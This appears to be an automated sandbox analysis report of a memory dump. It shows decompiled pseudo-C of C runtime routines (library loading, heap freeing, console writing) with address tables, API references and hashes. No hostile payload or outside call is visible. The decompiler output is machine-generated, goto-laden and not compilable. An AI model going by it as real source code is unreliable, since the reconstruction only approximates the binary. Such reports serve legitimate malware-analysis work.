                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                                                                                								_t16 = _t32;
                                                                                                                                                                                                                                								L18:
                                                                                                                                                                                                                                								return _t16;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                                							_t29 =  &(_t29[1]);
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = GetLastError();
                                                                                                                                                                                                                                						if(_t18 != 0x57) {
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							_t32 = 0;
                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *_v8 = _t18 | 0xffffffff;
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = E736D9913(_t23, L"api-ms-", 7);
                                                                                                                                                                                                                                						_t34 = _t34 + 0xc;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = E736D9913(_t23, L"ext-ms-", 7);
                                                                                                                                                                                                                                						_t34 = _t34 + 0xc;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                                                                                                                                                                                                						_t32 = _t18;
                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t32 == 0xffffffff) {
                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t16 = 0;
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                0x736dba58
                                                                                                                                                                                                                                0x736db9f2
                                                                                                                                                                                                                                0x736db9fb
                                                                                                                                                                                                                                0x736dba32
                                                                                                                                                                                                                                0x736dba32
                                                                                                                                                                                                                                0x736dba34
                                                                                                                                                                                                                                0x736dba36
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba3e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba3e
                                                                                                                                                                                                                                0x736dba05
                                                                                                                                                                                                                                0x736dba0a
                                                                                                                                                                                                                                0x736dba0f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba19
                                                                                                                                                                                                                                0x736dba1e
                                                                                                                                                                                                                                0x736dba23
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba28
                                                                                                                                                                                                                                0x736dba2e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba2e
                                                                                                                                                                                                                                0x736db9cf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736db9d5
                                                                                                                                                                                                                                0x736dba64
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 0-537541572
                                                                                                                                                                                                                                • Opcode ID: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction ID: bd3f09eb500b2476a93856ba6a92cdf78bda29b44807552fa0e939510c4026fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7210B72A51214FBDF129665CD44B5A3BADEB01760F1C0251ED1BAB2C9EBB0DD04C6E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DEA18(intOrPtr _a4) {
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t45 = _a4;
                                                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                                                					E736DE9E0(_t45, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x98, 2);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                					E736DE9E0(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                					return E736DA293( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t18;
                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DE9E0: _free.LIBCMT ref: 736DEA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA66
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA71
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA7C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAD0
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEADB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAE6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAF1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                                                                                                			E736DDB2B(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char _v23;
                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                				void _v32;
                                                                                                                                                                                                                                				signed int _v33;
                                                                                                                                                                                                                                				long _v40;
                                                                                                                                                                                                                                				signed char _v44;
                                                                                                                                                                                                                                				char _v47;
                                                                                                                                                                                                                                				void _v48;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				long _v56;
                                                                                                                                                                                                                                				char _v60;
                                                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                                                				char _v72;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v76;
                                                                                                                                                                                                                                				signed char _v80;
                                                                                                                                                                                                                                				signed char _v84;
                                                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                                                				signed int _v92;
                                                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                                                				long _v100;
                                                                                                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                                                                                                				signed char _v112;
                                                                                                                                                                                                                                				void* _v116;
                                                                                                                                                                                                                                				char _v120;
                                                                                                                                                                                                                                				int _v124;
                                                                                                                                                                                                                                				intOrPtr _v128;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v132;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v136;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v140;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _v144;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				signed int _t172;
                                                                                                                                                                                                                                				signed int _t174;
                                                                                                                                                                                                                                				int _t178;
                                                                                                                                                                                                                                				intOrPtr _t183;
                                                                                                                                                                                                                                				intOrPtr _t186;
                                                                                                                                                                                                                                				void* _t188;
                                                                                                                                                                                                                                				void* _t190;
                                                                                                                                                                                                                                				long _t193;
                                                                                                                                                                                                                                				void _t198;
                                                                                                                                                                                                                                				long _t202;
                                                                                                                                                                                                                                				void* _t206;
                                                                                                                                                                                                                                				intOrPtr _t212;
                                                                                                                                                                                                                                				signed char* _t213;
                                                                                                                                                                                                                                				char _t216;
                                                                                                                                                                                                                                				signed int _t219;
                                                                                                                                                                                                                                				char* _t220;
                                                                                                                                                                                                                                				void* _t222;
                                                                                                                                                                                                                                				long _t228;
                                                                                                                                                                                                                                				intOrPtr _t229;
                                                                                                                                                                                                                                				char _t231;
                                                                                                                                                                                                                                				signed char _t235;
                                                                                                                                                                                                                                				signed int _t244;
                                                                                                                                                                                                                                				intOrPtr _t247;
                                                                                                                                                                                                                                				signed char _t250;
                                                                                                                                                                                                                                				signed int _t251;
                                                                                                                                                                                                                                				signed char _t253;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _t254;
                                                                                                                                                                                                                                				intOrPtr _t256;
                                                                                                                                                                                                                                				void* _t260;
                                                                                                                                                                                                                                				signed char _t261;
                                                                                                                                                                                                                                				void* _t262;
                                                                                                                                                                                                                                				void* _t264;
                                                                                                                                                                                                                                				long _t266;
                                                                                                                                                                                                                                				signed int _t269;
                                                                                                                                                                                                                                				long _t270;
                                                                                                                                                                                                                                				struct _OVERLAPPED* _t271;
                                                                                                                                                                                                                                				signed int _t272;
                                                                                                                                                                                                                                				intOrPtr _t274;
                                                                                                                                                                                                                                				signed int _t276;
                                                                                                                                                                                                                                				signed int _t279;
                                                                                                                                                                                                                                				long _t280;
                                                                                                                                                                                                                                				long _t281;
                                                                                                                                                                                                                                				signed char _t282;
                                                                                                                                                                                                                                				intOrPtr _t283;
                                                                                                                                                                                                                                				signed int _t284;
                                                                                                                                                                                                                                				void* _t285;
                                                                                                                                                                                                                                				void* _t286;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t172 =  *0x736eb004; // 0xd4a5741
                                                                                                                                                                                                                                				_v8 = _t172 ^ _t284;
                                                                                                                                                                                                                                				_t174 = _a8;
                                                                                                                                                                                                                                				_t261 = _a12;
                                                                                                                                                                                                                                				_t272 = (_t174 & 0x0000003f) * 0x38;
                                                                                                                                                                                                                                				_t244 = _t174 >> 6;
                                                                                                                                                                                                                                				_v112 = _t261;
                                                                                                                                                                                                                                				_v84 = _t244;
                                                                                                                                                                                                                                				_v80 = _t272;
                                                                                                                                                                                                                                				_t274 = _a16 + _t261;
                                                                                                                                                                                                                                				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x736ef800 + _t244 * 4)) + 0x18));
                                                                                                                                                                                                                                				_v104 = _t274;
                                                                                                                                                                                                                                				_t178 = GetConsoleCP();
                                                                                                                                                                                                                                				_t242 = 0;
                                                                                                                                                                                                                                				_v124 = _t178;
                                                                                                                                                                                                                                				E736D97DC( &_v72, _t261, 0);
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_t247 =  *((intOrPtr*)(_v68 + 8));
                                                                                                                                                                                                                                				_v128 = _t247;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_t266 = _v112;
                                                                                                                                                                                                                                				_v40 = _t266;
                                                                                                                                                                                                                                				if(_t266 >= _t274) {
                                                                                                                                                                                                                                					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x736ef800 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x736eb750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x736eb750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E736D82C0( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E736DE75D(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E736DB595(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
                                                                                                                                                                                                                                											goto L52;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t276 = _v88 - _v112 + _t266;
                                                                                                                                                                                                                                											_v92 = _t276;
                                                                                                                                                                                                                                											if(_v100 < _v56) {
                                                                                                                                                                                                                                												goto L52;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												if(_v47 != 0xa) {
                                                                                                                                                                                                                                													L38:
                                                                                                                                                                                                                                													if(_t266 >= _v104) {
                                                                                                                                                                                                                                														goto L52;
                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                														_t247 = _v128;
                                                                                                                                                                                                                                														continue;
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													_t198 = 0xd;
                                                                                                                                                                                                                                													_v48 = _t198;
                                                                                                                                                                                                                                													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
                                                                                                                                                                                                                                														goto L51;
                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                														if(_v100 < 1) {
                                                                                                                                                                                                                                															goto L52;
                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                															_v88 = _v88 + 1;
                                                                                                                                                                                                                                															_t276 = _t276 + 1;
                                                                                                                                                                                                                                															_v92 = _t276;
                                                                                                                                                                                                                                															goto L38;
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L53;
                                                                                                                                                                                                                                						L23:
                                                                                                                                                                                                                                						_t250 = _v80;
                                                                                                                                                                                                                                						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
                                                                                                                                                                                                                                						__eflags = _t261 & 0x00000004;
                                                                                                                                                                                                                                						if((_t261 & 0x00000004) == 0) {
                                                                                                                                                                                                                                							_v33 =  *_t266;
                                                                                                                                                                                                                                							_t188 = E736DC8A4(_t261);
                                                                                                                                                                                                                                							_t251 = _v33 & 0x000000ff;
                                                                                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
                                                                                                                                                                                                                                								_push(1);
                                                                                                                                                                                                                                								_push(_t266);
                                                                                                                                                                                                                                								goto L30;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t202 = _t266 + 1;
                                                                                                                                                                                                                                								_v56 = _t202;
                                                                                                                                                                                                                                								__eflags = _t202 - _v104;
                                                                                                                                                                                                                                								if(_t202 >= _v104) {
                                                                                                                                                                                                                                									_t261 = _v84;
                                                                                                                                                                                                                                									_t253 = _v80;
                                                                                                                                                                                                                                									_t242 = _v33;
                                                                                                                                                                                                                                									 *((char*)(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2e)) = _v33;
                                                                                                                                                                                                                                									 *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                									_t279 = _t276 + 1;
                                                                                                                                                                                                                                									goto L45;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t206 = E736DC771( &_v76, _t266, 2);
                                                                                                                                                                                                                                									_t286 = _t285 + 0xc;
                                                                                                                                                                                                                                									__eflags = _t206 - 0xffffffff;
                                                                                                                                                                                                                                									if(_t206 == 0xffffffff) {
                                                                                                                                                                                                                                										goto L52;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t266 = _v56;
                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t261 = _t261 & 0x000000fb;
                                                                                                                                                                                                                                							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
                                                                                                                                                                                                                                							_v23 =  *_t266;
                                                                                                                                                                                                                                							_push(2);
                                                                                                                                                                                                                                							 *(_t250 + _v52 + 0x2d) = _t261;
                                                                                                                                                                                                                                							_push( &_v24);
                                                                                                                                                                                                                                							L30:
                                                                                                                                                                                                                                							_push( &_v76);
                                                                                                                                                                                                                                							_t190 = E736DC771();
                                                                                                                                                                                                                                							_t286 = _t285 + 0xc;
                                                                                                                                                                                                                                							__eflags = _t190 - 0xffffffff;
                                                                                                                                                                                                                                							if(_t190 == 0xffffffff) {
                                                                                                                                                                                                                                								goto L52;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L31;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L53;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L53:
                                                                                                                                                                                                                                				if(__eflags != 0) {
                                                                                                                                                                                                                                					_t183 = _v72;
                                                                                                                                                                                                                                					_t167 = _t183 + 0x350;
                                                                                                                                                                                                                                					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                					__eflags =  *_t167;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				__eflags = _v8 ^ _t284;
                                                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                                                				return E736D6EA3(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                0x736ddb98
                                                                                                                                                                                                                                0x736ddb9b
                                                                                                                                                                                                                                0x736ddba0
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba9
                                                                                                                                                                                                                                0x736ddbab
                                                                                                                                                                                                                                0x736ddbb1
                                                                                                                                                                                                                                0x736ddbb4
                                                                                                                                                                                                                                0x736ddbbb
                                                                                                                                                                                                                                0x736ddbc2
                                                                                                                                                                                                                                0x736ddbcb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbd1
                                                                                                                                                                                                                                0x736ddbd7
                                                                                                                                                                                                                                0x736ddbd9
                                                                                                                                                                                                                                0x736ddbdb
                                                                                                                                                                                                                                0x736ddbde
                                                                                                                                                                                                                                0x736ddbe3
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x736ddbec
                                                                                                                                                                                                                                0x736ddbef
                                                                                                                                                                                                                                0x736ddbf1
                                                                                                                                                                                                                                0x736ddbf6
                                                                                                                                                                                                                                0x736ddca8
                                                                                                                                                                                                                                0x736ddca9
                                                                                                                                                                                                                                0x736ddcac
                                                                                                                                                                                                                                0x736ddcae
                                                                                                                                                                                                                                0x736dde5c
                                                                                                                                                                                                                                0x736dde5e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde63
                                                                                                                                                                                                                                0x736dde66
                                                                                                                                                                                                                                0x736dde6f
                                                                                                                                                                                                                                0x736dde72
                                                                                                                                                                                                                                0x736dde73
                                                                                                                                                                                                                                0x736dde77
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde7e
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb9
                                                                                                                                                                                                                                0x736ddcbc
                                                                                                                                                                                                                                0x736ddcc2
                                                                                                                                                                                                                                0x736ddcc8
                                                                                                                                                                                                                                0x736ddcd1
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd5
                                                                                                                                                                                                                                0x736ddcd6
                                                                                                                                                                                                                                0x736ddcd9
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x736ddbfc
                                                                                                                                                                                                                                0x736ddc0b
                                                                                                                                                                                                                                0x736ddc0c
                                                                                                                                                                                                                                0x736ddc0f
                                                                                                                                                                                                                                0x736ddc11
                                                                                                                                                                                                                                0x736ddc16
                                                                                                                                                                                                                                0x736dde27
                                                                                                                                                                                                                                0x736dde29
                                                                                                                                                                                                                                0x736dde2b
                                                                                                                                                                                                                                0x736dde2e
                                                                                                                                                                                                                                0x736dde33
                                                                                                                                                                                                                                0x736dde3c
                                                                                                                                                                                                                                0x736dde3f
                                                                                                                                                                                                                                0x736dde40
                                                                                                                                                                                                                                0x736dde44
                                                                                                                                                                                                                                0x736dde47
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde57
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc20
                                                                                                                                                                                                                                0x736ddc22
                                                                                                                                                                                                                                0x736ddc25
                                                                                                                                                                                                                                0x736ddc28
                                                                                                                                                                                                                                0x736ddc2c
                                                                                                                                                                                                                                0x736ddc2d
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc34
                                                                                                                                                                                                                                0x736ddc39
                                                                                                                                                                                                                                0x736ddc45
                                                                                                                                                                                                                                0x736ddc4a
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc52
                                                                                                                                                                                                                                0x736ddc54
                                                                                                                                                                                                                                0x736ddc57
                                                                                                                                                                                                                                0x736ddc59
                                                                                                                                                                                                                                0x736ddc5c
                                                                                                                                                                                                                                0x736ddc5f
                                                                                                                                                                                                                                0x736ddc62
                                                                                                                                                                                                                                0x736ddc6a
                                                                                                                                                                                                                                0x736ddc6e
                                                                                                                                                                                                                                0x736ddc72
                                                                                                                                                                                                                                0x736ddc72

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 736DDB73
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 736DDD52
                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 736DDD6F
